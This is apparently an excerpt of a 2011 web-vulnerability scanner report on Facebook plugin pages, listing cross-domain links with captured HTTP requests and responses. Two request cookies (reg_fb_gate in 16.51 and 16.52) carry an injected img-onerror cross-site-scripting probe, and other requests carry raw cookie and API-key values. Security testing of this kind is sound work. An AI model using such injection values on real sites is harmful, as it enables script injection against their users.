http://aol.sportingnews.com/nfl/story/2011-05-04/athletes-like-rashard-mendenhall-are-finding-out-the-downside-of-twitter?fb_comment_id=fbc_10150174862354920_16359722_10150175127474920
http://aol.sportingnews.com/nfl/story/2011-05-04/athletes-like-rashard-mendenhall-are-finding-out-the-downside-of-twitter?fb_comment_id=fbc_10150174862354920_16359755_10150175128634920
http://aol.sportingnews.com/nfl/story/2011-05-04/athletes-like-rashard-mendenhall-are-finding-out-the-downside-of-twitter?fb_comment_id=fbc_10150174862354920_16360361_10150175151464920
http://profile.ak.fbcdn.net/hprofile-ak-snc4/161188_1020937929_5104297_q.jpg
http://profile.ak.fbcdn.net/hprofile-ak-snc4/174525_1054627735_64789_q.jpg
http://profile.ak.fbcdn.net/hprofile-ak-snc4/186000_831972862_4372260_q.jpg
http://profile.ak.fbcdn.net/hprofile-ak-snc4/187208_100000934370777_6596943_q.jpg
http://profile.ak.fbcdn.net/hprofile-ak-snc4/187593_100001547816690_2540739_q.jpg
http://profile.ak.fbcdn.net/hprofile-ak-snc4/195286_100001088242101_5524507_q.jpg
http://profile.ak.fbcdn.net/hprofile-ak-snc4/203420_1829766991_3267656_q.jpg
http://profile.ak.fbcdn.net/hprofile-ak-snc4/211232_1708077046_5678275_q.jpg
http://profile.ak.fbcdn.net/hprofile-ak-snc4/211287_1286867422_6012394_q.jpg
http://profile.ak.fbcdn.net/hprofile-ak-snc4/211995_1440527900_6271125_q.jpg
http://profile.ak.fbcdn.net/hprofile-ak-snc4/27364_827759867_7310_q.jpg
http://profile.ak.fbcdn.net/hprofile-ak-snc4/41774_1675365945_9562_q.jpg
http://profile.ak.fbcdn.net/hprofile-ak-snc4/49142_1308392513_7533553_q.jpg
http://profile.ak.fbcdn.net/hprofile-ak-snc4/50095_1231308703_4625795_q.jpg
http://profile.ak.fbcdn.net/static-ak/rsrc.php/v1/yo/r/UlIqmHJn-SK.gif
http://static.ak.fbcdn.net/rsrc.php/v1/y1/r/kKOeJEnwuz7.css
http://static.ak.fbcdn.net/rsrc.php/v1/y3/r/4wOZW9c83Yr.css
http://static.ak.fbcdn.net/rsrc.php/v1/y5/r/Z6PtFE_aVAz.css
http://static.ak.fbcdn.net/rsrc.php/v1/y6/r/D97gxsfJDCQ.css
http://static.ak.fbcdn.net/rsrc.php/v1/yD/r/rZiaNe7iEDZ.css
http://static.ak.fbcdn.net/rsrc.php/v1/yH/r/eIpbnVKI9lR.png
http://static.ak.fbcdn.net/rsrc.php/v1/yI/r/akOVLqNGOB0.png
http://static.ak.fbcdn.net/rsrc.php/v1/yQ/r/9qdm_pQmTM3.css
http://static.ak.fbcdn.net/rsrc.php/v1/yV/r/ecpCmrvFebs.js
http://static.ak.fbcdn.net/rsrc.php/v1/yX/r/AZ23fTP8PUp.css
http://static.ak.fbcdn.net/rsrc.php/v1/yb/r/GsNJNwuI-UM.gif

Request

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.136.149.126
X-Cnection: close
Date: Thu, 05 May 2011 01:11:26 GMT
Content-Length: 98347

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...
</title>
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/yD/r/rZiaNe7iEDZ.css" />
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/yX/r/AZ23fTP8PUp.css" />
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/y6/r/D97gxsfJDCQ.css" />
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/y5/r/Z6PtFE_aVAz.css" />
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/y1/r/kKOeJEnwuz7.css" />
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/yQ/r/9qdm_pQmTM3.css" />
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/y3/r/4wOZW9c83Yr.css" />

<script type="text/javascript" src="http://static.ak.fbcdn.net/rsrc.php/v1/yV/r/ecpCmrvFebs.js"></script>
...[SNIP]...
<a class="viewerProfileHref" onclick="return false;" target="_blank" href="#"><img class="uiProfilePhoto viewerProfilePic uiProfilePhotoLarge img" src="http://profile.ak.fbcdn.net/static-ak/rsrc.php/v1/yo/r/UlIqmHJn-SK.gif" /></a>
...[SNIP]...
</div><img class="throbber img" src="http://static.ak.fbcdn.net/rsrc.php/v1/yb/r/GsNJNwuI-UM.gif" width="16" height="11" /><div class="postToProfile hidden_elem">
...[SNIP]...
<a class="UIImageBlock_Image UIImageBlock_ENT_Image" href="http://www.facebook.com/wmoppert" target="_blank" tabindex="-1"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/41774_1675365945_9562_q.jpg" /></a>
...[SNIP]...
</a> .. <a class="uiLinkSubtle" href="http://aol.sportingnews.com/nfl/story/2011-05-04/athletes-like-rashard-mendenhall-are-finding-out-the-downside-of-twitter?fb_comment_id=fbc_10150174862354920_16359088_10150175101634920" target="_blank" onmousedown="UntrustedLink.bootstrap($(this), "c4dbd", event, bagof(null));" rel="nofollow"><abbr title="Wednesday, May 4, 2011 at 4:25pm" data-date="Wed, 04 May 2011 16:25:34 -0700" class="timestamp">
...[SNIP]...
<a class="UIImageBlock_Image UIImageBlock_ENT_Image" href="http://www.facebook.com/matthew.oliveira2" target="_blank" tabindex="-1"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/195286_100001088242101_5524507_q.jpg" /></a>
...[SNIP]...
<a class="UIImageBlock_Image UIImageBlock_ENT_Image" href="http://www.facebook.com/profile.php?id=1708077046" target="_blank" tabindex="-1"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/211232_1708077046_5678275_q.jpg" /></a>
...[SNIP]...
<a class="UIImageBlock_Image UIImageBlock_ENT_Image" href="http://www.facebook.com/osbornecruiser" target="_blank" tabindex="-1"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/186000_831972862_4372260_q.jpg" /></a>
...[SNIP]...
<input type="hidden" autocomplete="off" name="command" value="reply" /><img class="uiProfilePhoto viewerProfilePic uiProfilePhotoLarge img" src="http://profile.ak.fbcdn.net/static-ak/rsrc.php/v1/yo/r/UlIqmHJn-SK.gif" /><div class="replywrapper">
...[SNIP]...
<a class="UIImageBlock_Image UIImageBlock_ENT_Image" href="http://www.facebook.com/profile.php?id=100001547816690" target="_blank" tabindex="-1"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/187593_100001547816690_2540739_q.jpg" /></a>
...[SNIP]...
<span class="fsm fwn fcg"> .. <img class="star img" src="http://static.ak.fbcdn.net/rsrc.php/v1/yI/r/akOVLqNGOB0.png" width="15" height="14" /> Top Commenter .. <a class="uiLinkSubtle" href="http://www.facebook.com/pages/Editor-in-Chief/137829579583400" target="_blank">
...[SNIP]...
</a> .. <a class="uiLinkSubtle" href="http://aol.sportingnews.com/nfl/story/2011-05-04/athletes-like-rashard-mendenhall-are-finding-out-the-downside-of-twitter?fb_comment_id=fbc_10150174862354920_16357140_10150175027384920" target="_blank" onmousedown="UntrustedLink.bootstrap($(this), "c4dbd", event, bagof(null));" rel="nofollow"><abbr title="Wednesday, May 4, 2011 at 2:23pm" data-date="Wed, 04 May 2011 14:23:54 -0700" class="timestamp">
...[SNIP]...
<input type="hidden" autocomplete="off" name="command" value="reply" /><img class="uiProfilePhoto viewerProfilePic uiProfilePhotoLarge img" src="http://profile.ak.fbcdn.net/static-ak/rsrc.php/v1/yo/r/UlIqmHJn-SK.gif" /><div class="replywrapper">
...[SNIP]...
<a class="UIImageBlock_Image UIImageBlock_ENT_Image" href="#" target="_blank" tabindex="-1"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/211287_1286867422_6012394_q.jpg" /></a>
...[SNIP]...
</a> .. <a class="uiLinkSubtle" href="http://aol.sportingnews.com/nfl/story/2011-05-04/athletes-like-rashard-mendenhall-are-finding-out-the-downside-of-twitter?fb_comment_id=fbc_10150174862354920_16358036_10150175060969920" target="_blank" onmousedown="UntrustedLink.bootstrap($(this), "c4dbd", event, bagof(null));" rel="nofollow"><abbr title="Wednesday, May 4, 2011 at 3:14pm" data-date="Wed, 04 May 2011 15:14:49 -0700" class="timestamp">
...[SNIP]...
<input type="hidden" autocomplete="off" name="command" value="reply" /><img class="uiProfilePhoto viewerProfilePic uiProfilePhotoLarge img" src="http://profile.ak.fbcdn.net/static-ak/rsrc.php/v1/yo/r/UlIqmHJn-SK.gif" /><div class="replywrapper">
...[SNIP]...
<a class="UIImageBlock_Image UIImageBlock_ENT_Image" href="http://www.facebook.com/profile.php?id=1020937929" target="_blank" tabindex="-1"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/161188_1020937929_5104297_q.jpg" /></a>
...[SNIP]...
</a> .. <a class="uiLinkSubtle" href="http://aol.sportingnews.com/nfl/story/2011-05-04/athletes-like-rashard-mendenhall-are-finding-out-the-downside-of-twitter?fb_comment_id=fbc_10150174862354920_16359722_10150175127474920" target="_blank" onmousedown="UntrustedLink.bootstrap($(this), "c4dbd", event, bagof(null));" rel="nofollow"><abbr title="Wednesday, May 4, 2011 at 5:14pm" data-date="Wed, 04 May 2011 17:14:50 -0700" class="timestamp">
...[SNIP]...
<input type="hidden" autocomplete="off" name="command" value="reply" /><img class="uiProfilePhoto viewerProfilePic uiProfilePhotoLarge img" src="http://profile.ak.fbcdn.net/static-ak/rsrc.php/v1/yo/r/UlIqmHJn-SK.gif" /><div class="replywrapper">
...[SNIP]...
<a class="UIImageBlock_Image UIImageBlock_ENT_Image" href="http://www.facebook.com/profile.php?id=1308392513" target="_blank" tabindex="-1"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/49142_1308392513_7533553_q.jpg" /></a>
...[SNIP]...
</a> .. <a class="uiLinkSubtle" href="http://aol.sportingnews.com/nfl/story/2011-05-04/athletes-like-rashard-mendenhall-are-finding-out-the-downside-of-twitter?fb_comment_id=fbc_10150174862354920_16358894_10150175094164920" target="_blank" onmousedown="UntrustedLink.bootstrap($(this), "c4dbd", event, bagof(null));" rel="nofollow"><abbr title="Wednesday, May 4, 2011 at 4:10pm" data-date="Wed, 04 May 2011 16:10:52 -0700" class="timestamp">
...[SNIP]...
<input type="hidden" autocomplete="off" name="command" value="reply" /><img class="uiProfilePhoto viewerProfilePic uiProfilePhotoLarge img" src="http://profile.ak.fbcdn.net/static-ak/rsrc.php/v1/yo/r/UlIqmHJn-SK.gif" /><div class="replywrapper">
...[SNIP]...
<a class="UIImageBlock_Image UIImageBlock_ENT_Image" href="http://www.facebook.com/profile.php?id=1440527900" target="_blank" tabindex="-1"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/211995_1440527900_6271125_q.jpg" /></a>
...[SNIP]...
</a> .. <a class="uiLinkSubtle" href="http://aol.sportingnews.com/nfl/story/2011-05-04/athletes-like-rashard-mendenhall-are-finding-out-the-downside-of-twitter?fb_comment_id=fbc_10150174862354920_16359628_10150175124154920" target="_blank" onmousedown="UntrustedLink.bootstrap($(this), "c4dbd", event, bagof(null));" rel="nofollow"><abbr title="Wednesday, May 4, 2011 at 5:09pm" data-date="Wed, 04 May 2011 17:09:18 -0700" class="timestamp">
...[SNIP]...
<input type="hidden" autocomplete="off" name="command" value="reply" /><img class="uiProfilePhoto viewerProfilePic uiProfilePhotoLarge img" src="http://profile.ak.fbcdn.net/static-ak/rsrc.php/v1/yo/r/UlIqmHJn-SK.gif" /><div class="replywrapper">
...[SNIP]...
<a class="UIImageBlock_Image UIImageBlock_ENT_Image" href="http://www.facebook.com/profile.php?id=100000934370777" target="_blank" tabindex="-1"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/187208_100000934370777_6596943_q.jpg" /></a>
...[SNIP]...
</a> .. <a class="uiLinkSubtle" href="http://aol.sportingnews.com/nfl/story/2011-05-04/athletes-like-rashard-mendenhall-are-finding-out-the-downside-of-twitter?fb_comment_id=fbc_10150174862354920_16359685_10150175126409920" target="_blank" onmousedown="UntrustedLink.bootstrap($(this), "c4dbd", event, bagof(null));" rel="nofollow"><abbr title="Wednesday, May 4, 2011 at 5:12pm" data-date="Wed, 04 May 2011 17:12:50 -0700" class="timestamp">
...[SNIP]...
<input type="hidden" autocomplete="off" name="command" value="reply" /><img class="uiProfilePhoto viewerProfilePic uiProfilePhotoLarge img" src="http://profile.ak.fbcdn.net/static-ak/rsrc.php/v1/yo/r/UlIqmHJn-SK.gif" /><div class="replywrapper">
...[SNIP]...
<a class="UIImageBlock_Image UIImageBlock_ENT_Image" href="http://www.facebook.com/profile.php?id=827759867" target="_blank" tabindex="-1"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/27364_827759867_7310_q.jpg" /></a>
...[SNIP]...
</a> .. <a class="uiLinkSubtle" href="http://aol.sportingnews.com/nfl/story/2011-05-04/athletes-like-rashard-mendenhall-are-finding-out-the-downside-of-twitter?fb_comment_id=fbc_10150174862354920_16359755_10150175128634920" target="_blank" onmousedown="UntrustedLink.bootstrap($(this), "c4dbd", event, bagof(null));" rel="nofollow"><abbr title="Wednesday, May 4, 2011 at 5:16pm" data-date="Wed, 04 May 2011 17:16:48 -0700" class="timestamp">
...[SNIP]...
<input type="hidden" autocomplete="off" name="command" value="reply" /><img class="uiProfilePhoto viewerProfilePic uiProfilePhotoLarge img" src="http://profile.ak.fbcdn.net/static-ak/rsrc.php/v1/yo/r/UlIqmHJn-SK.gif" /><div class="replywrapper">
...[SNIP]...
<a class="UIImageBlock_Image UIImageBlock_ENT_Image" href="http://www.facebook.com/profile.php?id=1054627735" target="_blank" tabindex="-1"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/174525_1054627735_64789_q.jpg" /></a>
...[SNIP]...
</a> .. <a class="uiLinkSubtle" href="http://aol.sportingnews.com/nfl/story/2011-05-04/athletes-like-rashard-mendenhall-are-finding-out-the-downside-of-twitter?fb_comment_id=fbc_10150174862354920_16359614_10150175123854920" target="_blank" onmousedown="UntrustedLink.bootstrap($(this), "c4dbd", event, bagof(null));" rel="nofollow"><abbr title="Wednesday, May 4, 2011 at 5:08pm" data-date="Wed, 04 May 2011 17:08:43 -0700" class="timestamp">
...[SNIP]...
<a class="UIImageBlock_Image UIImageBlock_ENT_Image" href="http://www.facebook.com/profile.php?id=1829766991" target="_blank" tabindex="-1"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/203420_1829766991_3267656_q.jpg" /></a>
...[SNIP]...
<a class="UIImageBlock_Image UIImageBlock_ENT_Image" href="http://www.facebook.com/profile.php?id=1231308703" target="_blank" tabindex="-1"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/50095_1231308703_4625795_q.jpg" /></a>
...[SNIP]...
<input type="hidden" autocomplete="off" name="command" value="reply" /><img class="uiProfilePhoto viewerProfilePic uiProfilePhotoLarge img" src="http://profile.ak.fbcdn.net/static-ak/rsrc.php/v1/yo/r/UlIqmHJn-SK.gif" /><div class="replywrapper">
...[SNIP]...
<a class="UIImageBlock_Image UIImageBlock_ENT_Image" href="http://www.facebook.com/profile.php?id=1231308703" target="_blank" tabindex="-1"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/50095_1231308703_4625795_q.jpg" /></a>
...[SNIP]...
</a> .. <a class="uiLinkSubtle" href="http://aol.sportingnews.com/nfl/story/2011-05-04/athletes-like-rashard-mendenhall-are-finding-out-the-downside-of-twitter?fb_comment_id=fbc_10150174862354920_16360361_10150175151464920" target="_blank" onmousedown="UntrustedLink.bootstrap($(this), "c4dbd", event, bagof(null));" rel="nofollow"><abbr title="Wednesday, May 4, 2011 at 5:57pm" data-date="Wed, 04 May 2011 17:57:33 -0700" class="timestamp">
...[SNIP]...
<input type="hidden" autocomplete="off" name="command" value="reply" /><img class="uiProfilePhoto viewerProfilePic uiProfilePhotoLarge img" src="http://profile.ak.fbcdn.net/static-ak/rsrc.php/v1/yo/r/UlIqmHJn-SK.gif" /><div class="replywrapper">
...[SNIP]...
<span class="uiMorePagerLoader pam uiBoxLightblue fbFeedbackPagerLink"><img class="img" src="http://static.ak.fbcdn.net/rsrc.php/v1/yb/r/GsNJNwuI-UM.gif" width="16" height="11" /></span>
...[SNIP]...
<a class="UIImageBlock_Image UIImageBlock_ICON_Image" target="_blank" href="http://developers.facebook.com/plugins/?footer=1" tabindex="-1"><img class="img" src="http://static.ak.fbcdn.net/rsrc.php/v1/yH/r/eIpbnVKI9lR.png" width="14" height="14" /></a>
...[SNIP]...

16.49. http://www.facebook.com/plugins/facepile.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/plugins/facepile.php

Issue detail

The page was loaded from a URL containing a query string:

http://www.facebook.com/plugins/facepile.php?action=like&api_key=4d965afccc4d86c598dbf5d94fb34a7c&channel=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df3feba30ac%26origin%3Dhttp%253A%252F%252Fwww.huffingtonpost.com%252Ff3196709bc%26relation%3Dparent.parent%26transport%3Dpostmessage&locale=en_US&max_rows=2&sdk=joey&width=264

The response contains the following links to other domains:

http://static.ak.fbcdn.net/rsrc.php/v1/yD/r/rZiaNe7iEDZ.css
http://static.ak.fbcdn.net/rsrc.php/v1/yV/r/ecpCmrvFebs.js
http://static.ak.fbcdn.net/rsrc.php/v1/yX/r/AZ23fTP8PUp.css
http://static.ak.fbcdn.net/rsrc.php/v1/yj/r/QyZCsJKRLP8.css
http://static.ak.fbcdn.net/rsrc.php/yJ/r/H2SSvhJMJA-.xml
http://static.ak.fbcdn.net/rsrc.php/yi/r/q9U99v3_saj.ico

Request

GET /plugins/facepile.php?action=like&api_key=4d965afccc4d86c598dbf5d94fb34a7c&channel=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df3feba30ac%26origin%3Dhttp%253A%252F%252Fwww.huffingtonpost.com%252Ff3196709bc%26relation%3Dparent.parent%26transport%3Dpostmessage&locale=en_US&max_rows=2&sdk=joey&width=264 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.huffingtonpost.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS

Response

16.50. http://www.facebook.com/plugins/like.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/plugins/like.php

Issue detail

The page was loaded from a URL containing a query string:

http://www.facebook.com/plugins/like.php?action=like&api_key=132151116822711&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df214d667b%26origin%3Dhttp%253A%252F%252Fwww.mmafighting.com%252Ff2ec84b17c%26relation%3Dparent.parent%26transport%3Dpostmessage&href=http%3A%2F%2Fmmafighting.com%2F2011%2F05%2F04%2Fformer-nhl-enforcer-donald-brashear-to-fight-at-ringside-mma-11%2F&layout=standard&locale=en_US&node_type=link&ref=article&sdk=joey&show_faces=false&width=300

The response contains the following links to other domains:

http://static.ak.fbcdn.net/rsrc.php/v1/y0/r/7NS4A3NTFw2.css
http://static.ak.fbcdn.net/rsrc.php/v1/yV/r/ecpCmrvFebs.js

Request

Response

16.51. http://www.facebook.com/plugins/like.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/plugins/like.php

Issue detail

The page was loaded from a URL containing a query string:

http://www.facebook.com/plugins/like.php?href=

The response contains the following links to other domains:

http://static.ak.fbcdn.net/rsrc.php/v1/y0/r/S_dxvIdYJ4E.css
http://static.ak.fbcdn.net/rsrc.php/v1/yV/r/ecpCmrvFebs.js

Request

GET /plugins/like.php?href= HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; lsd=zTWKd; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FBucky-Jordan%2F100000824820783; wd=deleted; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2F10000082482078341583%253Cimg%2520src%3Da%2520onerror%3Dalert%281%29%253Eab0e5e0e0bd; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; reg_ext_ref=http%3A%2F%2Fburp%2Fshow%2F11;

Response

16.52. http://www.facebook.com/plugins/likebox.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/plugins/likebox.php

Issue detail

The page was loaded from a URL containing a query string:

http://www.facebook.com/plugins/likebox.php?id=100484820802&width=230&connections=0&stream=false&header=false&height=62

The response contains the following links to other domains:

http://profile.ak.fbcdn.net/hprofile-ak-snc4/50276_100484820802_1716483_q.jpg
http://static.ak.fbcdn.net/rsrc.php/v1/yD/r/rZiaNe7iEDZ.css
http://static.ak.fbcdn.net/rsrc.php/v1/yV/r/ecpCmrvFebs.js
http://static.ak.fbcdn.net/rsrc.php/v1/yX/r/AZ23fTP8PUp.css
http://static.ak.fbcdn.net/rsrc.php/yJ/r/H2SSvhJMJA-.xml
http://static.ak.fbcdn.net/rsrc.php/yi/r/q9U99v3_saj.ico

Request

GET /plugins/likebox.php?id=100484820802&width=230&connections=0&stream=false&header=false&height=62 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://itunes.apple.com/us/app/engadget/id347839246?mt=8
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; lsd=zTWKd; datr=ituyTcnawc6q7VcE0gibPCo2; L=2; reg_ext_ref=http%3A%2F%2Fburp%2Fshow%2F12; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2F1242845259e76bc%253Cimg%2520src%3Da%2520onerror%3Dalert%281%29%253Eb0233c9330b; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FAlexander-Bucky-Jordan%2F1242845259; wd=1022x1007; _e_vm3q_0=%5B%22vm3q%22%2C1304617033840%2C%22act%22%2C1304617032828%2C1%2C%22https%3A%2F%2Fwww.facebook.com%2Fh02332%23%22%2C%22a%22%2C%22click%22%2C%22-%22%2C%22r%22%2C%22%2Fh02332%22%2C%7B%7D%2C73%2C218%2C0%2C1006%2C16%5D; act=1304617037875%2F2; _e_vm3q_1=%5B%22vm3q%22%2C1304617037875%2C%22act%22%2C1304617037875%2C2%2C%22https%3A%2F%2Fwww.facebook.com%2Fh02332%23%22%2C%22a%22%2C%22click%22%2C%22-%22%2C%22r%22%2C%22%2Fh02332%22%2C%7B%7D%2C197%2C146%2C0%2C1006%2C16%5D

Response

16.53. http://www.facebook.com/plugins/likebox.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/plugins/likebox.php

Issue detail

The page was loaded from a URL containing a query string:

http://www.facebook.com/plugins/likebox.php?api_key=117854138246106&channel=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df29ad2e5e%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff1f93db008%26relation%3Dparent.parent%26transport%3Dpostmessage&colorscheme=light&connections=10&header=false&height=180&href=http%3A%2F%2Fwww.facebook.com%2Fsportingnews&locale=en_US&sdk=joey&show_faces=true&stream=false&width=298

The response contains the following links to other domains:

http://profile.ak.fbcdn.net/hprofile-ak-snc4/161659_100000284158351_5615996_q.jpg
http://profile.ak.fbcdn.net/hprofile-ak-snc4/186026_100000227723086_3083391_q.jpg
http://profile.ak.fbcdn.net/hprofile-ak-snc4/186306_100001677506211_2725896_q.jpg
http://profile.ak.fbcdn.net/hprofile-ak-snc4/186714_1605429091_6843314_q.jpg
http://profile.ak.fbcdn.net/hprofile-ak-snc4/187084_100001563480027_4806394_q.jpg
http://profile.ak.fbcdn.net/hprofile-ak-snc4/187521_1003057323_1281803_q.jpg
http://profile.ak.fbcdn.net/hprofile-ak-snc4/195432_1620706090_6822998_q.jpg
http://profile.ak.fbcdn.net/hprofile-ak-snc4/195659_1694427025_5881089_q.jpg
http://profile.ak.fbcdn.net/hprofile-ak-snc4/202830_100002180027523_7402851_q.jpg
http://profile.ak.fbcdn.net/hprofile-ak-snc4/202988_736611069_7575841_q.jpg
http://profile.ak.fbcdn.net/hprofile-ak-snc4/203061_100001922588645_5847502_q.jpg
http://profile.ak.fbcdn.net/hprofile-ak-snc4/203247_100000255574831_1503849_q.jpg
http://profile.ak.fbcdn.net/hprofile-ak-snc4/211386_100000863514899_5837555_q.jpg
http://profile.ak.fbcdn.net/hprofile-ak-snc4/211391_713468228_4670594_q.jpg
http://profile.ak.fbcdn.net/hprofile-ak-snc4/211540_1238885907_2541593_q.jpg
http://profile.ak.fbcdn.net/hprofile-ak-snc4/211544_100000505084012_4898663_q.jpg
http://profile.ak.fbcdn.net/hprofile-ak-snc4/211563_100002020447663_1302764_q.jpg
http://profile.ak.fbcdn.net/hprofile-ak-snc4/27414_100000862415977_9649_q.jpg
http://profile.ak.fbcdn.net/hprofile-ak-snc4/48975_100000541068085_1143330_q.jpg
http://profile.ak.fbcdn.net/hprofile-ak-snc4/50274_112585963017_76_q.jpg
http://profile.ak.fbcdn.net/static-ak/rsrc.php/v1/yo/r/UlIqmHJn-SK.gif
http://static.ak.fbcdn.net/rsrc.php/v1/yD/r/rZiaNe7iEDZ.css
http://static.ak.fbcdn.net/rsrc.php/v1/yH/r/eIpbnVKI9lR.png
http://static.ak.fbcdn.net/rsrc.php/v1/yV/r/ecpCmrvFebs.js
http://static.ak.fbcdn.net/rsrc.php/v1/yX/r/AZ23fTP8PUp.css
http://static.ak.fbcdn.net/rsrc.php/yJ/r/H2SSvhJMJA-.xml
http://static.ak.fbcdn.net/rsrc.php/yi/r/q9U99v3_saj.ico

Request

GET /plugins/likebox.php?api_key=117854138246106&channel=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df29ad2e5e%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff1f93db008%26relation%3Dparent.parent%26transport%3Dpostmessage&colorscheme=light&connections=10&header=false&height=180&href=http%3A%2F%2Fwww.facebook.com%2Fsportingnews&locale=en_US&sdk=joey&show_faces=true&stream=false&width=298 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://aol.sportingnews.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS

Response

16.54. http://www.facebook.com/plugins/likebox.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/plugins/likebox.php

Issue detail

The page was loaded from a URL containing a query string:

http://www.facebook.com/plugins/likebox.php?id=8062627951&width=300&connections=10&stream=false&header=false&height=255

The response contains the following links to other domains:

http://profile.ak.fbcdn.net/hprofile-ak-snc4/161097_930382_8228585_q.jpg
http://profile.ak.fbcdn.net/hprofile-ak-snc4/161182_100000618593365_7043129_q.jpg
